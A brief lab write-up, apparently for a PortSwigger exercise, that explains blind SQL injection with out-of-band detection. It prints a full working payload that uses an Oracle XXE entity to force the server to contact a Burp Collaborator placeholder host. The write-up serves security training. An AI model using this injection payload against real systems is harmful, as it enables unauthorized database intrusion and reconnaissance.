This web application handles SQL queries asynchronously, making it difficult to detect the results of a SQL injection attack. This includes trying to determine the type of SQL database in use. To solve this, we eventually use the Oracle XXE vulnerability to trigger a DNS lookup. This lab requires the use of PortSwigger’s Burp Suite Professional distribution, however, in a real engagement you could always create your own DNS server to capture the DNS lookup. Here’s the payload:
TrackingId=Rr0hDYsZaZYs6nuZ'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--